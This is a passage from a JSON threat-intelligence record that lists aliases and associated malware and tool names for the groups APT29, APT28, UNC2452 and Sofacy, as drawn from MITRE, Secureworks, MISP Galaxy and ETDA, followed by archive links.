			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e",
			"created_at": "2024-06-04T02:03:07.956135Z",
			"updated_at": "2026-04-10T02:00:03.689959Z",
			"deleted_at": null,
			"main_name": "IRON HEMLOCK",
			"aliases": [
				"APT29 ",
				"ATK7 ",
				"Blue Kitsune ",
				"Cozy Bear ",
				"The Dukes",
				"UNC2452 ",
				"YTTRIUM "
			],
			"source_name": "Secureworks:IRON HEMLOCK",
			"tools": [
				"CosmicDuke",
				"CozyCar",
				"CozyDuke",
				"DiefenDuke",
				"FatDuke",
				"HAMMERTOSS",
				"LiteDuke",
				"MiniDuke",
				"OnionDuke",
				"PolyglotDuke",
				"RegDuke",
				"RegDuke Loader",
				"SeaDuke",
				"Sliver"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a241a1ca-2bc9-450b-a07b-aae747ee2710",
			"created_at": "2024-06-19T02:03:08.150052Z",
			"updated_at": "2026-04-10T02:00:03.737173Z",
			"deleted_at": null,
			"main_name": "IRON RITUAL",
			"aliases": [
				"APT29",
				"Blue Dev 5 ",
				"BlueBravo ",
				"Cloaked Ursa ",
				"CozyLarch ",
				"Dark Halo ",
				"Midnight Blizzard ",
				"NOBELIUM ",
				"StellarParticle ",
				"UNC2452 "
			],
			"source_name": "Secureworks:IRON RITUAL",
			"tools": [
				"Brute Ratel C4",
				"Cobalt Strike",
				"EnvyScout",
				"GoldFinder",
				"GoldMax",
				"NativeZone",
				"RAINDROP",
				"SUNBURST",
				"Sibot",
				"TEARDROP",
				"VaporRage"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb",
			"created_at": "2023-01-06T13:46:38.393409Z",
			"updated_at": "2026-04-10T02:00:02.955738Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"Cloaked Ursa",
				"TA421",
				"Blue Kitsune",
				"BlueBravo",
				"IRON HEMLOCK",
				"G0016",
				"Nobelium",
				"Group 100",
				"YTTRIUM",
				"Grizzly Steppe",
				"ATK7",
				"ITG11",
				"COZY BEAR",
				"The Dukes",
				"Minidionis",
				"UAC-0029",
				"SeaDuke"
			],
			"source_name": "MISPGALAXY:APT29",
			"tools": [
				"SNOWYAMBER",
				"HALFRIG",
				"QUARTERRIG"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "70872c3a-e788-4b55-a7d6-b2df52001ad0",
			"created_at": "2023-01-06T13:46:39.18401Z",
			"updated_at": "2026-04-10T02:00:03.239111Z",
			"deleted_at": null,
			"main_name": "UNC2452",
			"aliases": [
				"DarkHalo",
				"StellarParticle",
				"NOBELIUM",
				"Solar Phoenix",
				"Midnight Blizzard"
			],
			"source_name": "MISPGALAXY:UNC2452",
			"tools": [
				"SNOWYAMBER",
				"HALFRIG",
				"QUARTERRIG"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a",
			"created_at": "2022-10-25T15:50:23.548494Z",
			"updated_at": "2026-04-10T02:00:05.292748Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"APT29",
				"IRON RITUAL",
				"IRON HEMLOCK",
				"NobleBaron",
				"Dark Halo",
				"NOBELIUM",
				"UNC2452",
				"YTTRIUM",
				"The Dukes",
				"Cozy Bear",
				"CozyDuke",
				"SolarStorm",
				"Blue Kitsune",
				"UNC3524",
				"Midnight Blizzard"
			],
			"source_name": "MITRE:APT29",
			"tools": [
				"PinchDuke",
				"ROADTools",
				"WellMail",
				"CozyCar",
				"Mimikatz",
				"Tasklist",
				"OnionDuke",
				"FatDuke",
				"POSHSPY",
				"EnvyScout",
				"SoreFang",
				"GeminiDuke",
				"reGeorg",
				"GoldMax",
				"FoggyWeb",
				"SDelete",
				"PolyglotDuke",
				"AADInternals",
				"MiniDuke",
				"SeaDuke",
				"Sibot",
				"RegDuke",
				"CloudDuke",
				"GoldFinder",
				"AdFind",
				"PsExec",
				"NativeZone",
				"Systeminfo",
				"ipconfig",
				"Impacket",
				"Cobalt Strike",
				"PowerDuke",
				"QUIETEXIT",
				"HAMMERTOSS",
				"BoomBox",
				"CosmicDuke",
				"WellMess",
				"VaporRage",
				"LiteDuke"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab",
			"created_at": "2022-10-25T16:07:24.212584Z",
			"updated_at": "2026-04-10T02:00:04.900038Z",
			"deleted_at": null,
			"main_name": "Sofacy",
			"aliases": [
				"APT 28",
				"ATK 5",
				"Blue Athena",
				"BlueDelta",
				"FROZENLAKE",
				"Fancy Bear",
				"Fighting Ursa",
				"Forest Blizzard",
				"G0007",
				"Grey-Cloud",
				"Grizzly Steppe",
				"Group 74",
				"GruesomeLarch",
				"ITG05",
				"Iron Twilight",
				"Operation DealersChoice",
				"Operation Dear Joohn",
				"Operation Komplex",
				"Operation Pawn Storm",
				"Operation RoundPress",
				"Operation Russian Doll",
				"Operation Steal-It",
				"Pawn Storm",
				"SIG40",
				"Sednit",
				"Snakemackerel",
				"Sofacy",
				"Strontium",
				"T-APT-12",
				"TA422",
				"TAG-0700",
				"TAG-110",
				"TG-4127",
				"Tsar Team",
				"UAC-0028",
				"UAC-0063"
			],
			"source_name": "ETDA:Sofacy",
			"tools": [
				"ADVSTORESHELL",
				"AZZY",
				"Backdoor.SofacyX",
				"CHERRYSPY",
				"CORESHELL",
				"Carberp",
				"Computrace",
				"DealersChoice",
				"Delphacy",
				"Downdelph",
				"Downrage",
				"Drovorub",
				"EVILTOSS",
				"Foozer",
				"GAMEFISH",
				"GooseEgg",
				"Graphite",
				"HATVIBE",
				"HIDEDRV",
				"Headlace",
				"Impacket",
				"JHUHUGIT",
				"JKEYSKW",
				"Koadic",
				"Komplex",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LoJack",
				"LoJax",
				"MASEPIE",
				"Mimikatz",
				"NETUI",
				"Nimcy",
				"OCEANMAP",
				"OLDBAIT",
				"PocoDown",
				"PocoDownloader",
				"Popr-d30",
				"ProcDump",
				"PythocyDbg",
				"SMBExec",
				"SOURFACE",
				"SPLM",
				"STEELHOOK",
				"Sasfis",
				"Sedkit",
				"Sednit",
				"Sedreco",
				"Seduploader",
				"Shunnael",
				"SkinnyBoy",
				"Sofacy",
				"SofacyCarberp",
				"SpiderLabs Responder",
				"Trojan.Shunnael",
				"Trojan.Sofacy",
				"USB Stealer",
				"USBStealer",
				"VPNFilter",
				"Win32/USBStealer",
				"WinIDS",
				"Winexe",
				"X-Agent",
				"X-Tunnel",
				"XAPS",
				"XTunnel",
				"Xagent",
				"Zebrocy",
				"Zekapab",
				"carberplike",
				"certutil",
				"certutil.exe",
				"fysbis",
				"webhp"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270",
			"created_at": "2022-10-25T16:07:23.341684Z",
			"updated_at": "2026-04-10T02:00:04.549917Z",
			"deleted_at": null,
			"main_name": "APT 29",
			"aliases": [
				"APT 29",
				"ATK 7",
				"Blue Dev 5",
				"BlueBravo",
				"Cloaked Ursa",
				"CloudLook",
				"Cozy Bear",
				"Dark Halo",
				"Earth Koshchei",
				"G0016",
				"Grizzly Steppe",
				"Group 100",
				"ITG11",
				"Iron Hemlock",
				"Iron Ritual",
				"Midnight Blizzard",
				"Minidionis",
				"Nobelium",
				"NobleBaron",
				"Operation Ghost",
				"Operation Office monkeys",
				"Operation StellarParticle",
				"SilverFish",
				"Solar Phoenix",
				"SolarStorm",
				"StellarParticle",
				"TEMP.Monkeys",
				"The Dukes",
				"UNC2452",
				"UNC3524",
				"Yttrium"
			],
			"source_name": "ETDA:APT 29",
			"tools": [
				"7-Zip",
				"ATI-Agent",
				"AdFind",
				"Agentemis",
				"AtNow",
				"BEATDROP",
				"BotgenStudios",
				"CEELOADER",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobalt Strike",
				"CobaltStrike",
				"CosmicDuke",
				"Cozer",
				"CozyBear",
				"CozyCar",
				"CozyDuke",
				"Danfuan",
				"EnvyScout",
				"EuroAPT",
				"FatDuke",
				"FoggyWeb",
				"GeminiDuke",
				"Geppei",
				"GoldFinder",
				"GoldMax",
				"GraphDrop",
				"GraphicalNeutrino",
				"GraphicalProton",
				"HAMMERTOSS",
				"HammerDuke",
				"LOLBAS",
				"LOLBins",
				"LiteDuke",
				"Living off the Land",
				"MagicWeb",
				"Mimikatz",
				"MiniDionis",
				"MiniDuke",
				"NemesisGemina",
				"NetDuke",
				"OnionDuke",
				"POSHSPY",
				"PinchDuke",
				"PolyglotDuke",
				"PowerDuke",
				"QUIETEXIT",
				"ROOTSAW",
				"RegDuke",
				"Rubeus",
				"SNOWYAMBER",
				"SPICYBEAT",
				"SUNSHUTTLE",
				"SeaDaddy",
				"SeaDask",
				"SeaDesk",
				"SeaDuke",
				"Sharp-SMBExec",
				"SharpView",
				"Sibot",
				"Solorigate",
				"SoreFang",
				"TinyBaron",
				"WINELOADER",
				"WellMail",
				"WellMess",
				"cobeacon",
				"elf.wellmess",
				"reGeorg",
				"tDiscoverer"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434384,
	"ts_updated_at": 1775792270,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a90da8d6f7f0c84257a2dc2fdd6f05c86b48bd8f.pdf",
		"text": "https://archive.orkl.eu/a90da8d6f7f0c84257a2dc2fdd6f05c86b48bd8f.txt",
		"img": "https://archive.orkl.eu/a90da8d6f7f0c84257a2dc2fdd6f05c86b48bd8f.jpg"
	}
}